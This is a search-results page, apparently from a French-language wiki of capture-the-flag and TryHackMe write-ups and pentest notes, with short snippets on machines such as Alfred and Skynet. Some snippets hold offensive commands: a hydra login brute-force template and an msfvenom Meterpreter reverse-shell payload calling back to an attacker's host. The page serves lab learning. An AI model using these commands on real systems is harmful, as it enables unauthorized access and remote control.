Skip to main content
Advanced Search
Search Terms
Content Type

Exact Matches
Tag Searches
Date Options
Updated after
Updated before
Created after
Created before

Search Results

9 total results found

Mascarade (100 points)

Cryptographie

Description Bob a le flag. Et il l’envoie à Alice en utilisant un échange de clé sécurisé et du chiffrement authentifié. Le code qu’il utilise est dans le fichier ake_server.rs. Comme on peut le voir, c’est du Rust, donc pas de vulnérabilité à exploiter sur...

Bruteforce

Bruteforce

Login page Bruteforce d'une page de login avec hydra : hydra -s <PORT> <IP> http-post-form "<PATH>:<KEY>:<VALUE>:<ERROR MSG>" -L user.txt -P pass.txt Exemple : hydra -s 8080 10.10.57.111 http-post-form "/j_acegi_security_check:j_username=^USER^&j_password=...

Alfred

Writeup

Task 1 On commence par réaliser un scan de notre machine : On découvre 3 ports ouverts. 2 Services web 80 et 8080 1 Service de RDP 3389 Le port 80 ne nous offre rien mais le 8080 nous montre une page de connexion pour Jenkins. Par défaut, les creds...

RouterSpace

Machines Facile

Énumération On commence classiquement par un scan réseau avec Nmap Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-09 13:04 EDTNmap scan report for 10.10.11.148Host is up (0.054s latency).Not shown: 998 filtered tcp ports (no-response)PORT STATE SERVICE...

HackPark

Writeup

Task 1 On reconnait facilement le clow de "ça" sur le site internet. Son nom est donc pennywise Task 2 On découvre facilement la page de login : Comme preque toutes les pages de login, elle accepte les requêtes en POST. Pour trouver le mot de passe on...

Reverse Shell

Msfconsole

Windows Metasploit Une fois un premier shell obtenu sous windows, il est possible d'en obtenir un meilleur qui soit plus stable. Pour cela on commence par créer un payload avec msfvenom : msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip-kali> LPORT=<po...

Game Zone

Writeup

Task 1 On commence par réaliser un scan de notre machine Seul le SSH ainsi qu'un site web ou l'on découvre l'agent 47 personage principal de Hitman. Task 2 On commence par suivre les instructions de TryHackMe qui nous apprends les bases de l'injection SQ...

Enumération Linux

Priv Esc

Sockets Pour obtenir la liste des sockets actives sur un poste linux la commande SS est très utile : Arguments Description -t Sockets TCP -u Sockets UDP -l Seulement les sockets d'écoute -p Affiche le processus de la socket ...

Skynet

Writeup

Task 1 On commence par notre scan des ports : On dispose donc d'un site, d'un serveur samba ainsi que de deux autres ports. Commençons par le site internet : SQLMap nous dit qu'il n'est pas injectable, une petite énumération via gobuster nous permet de...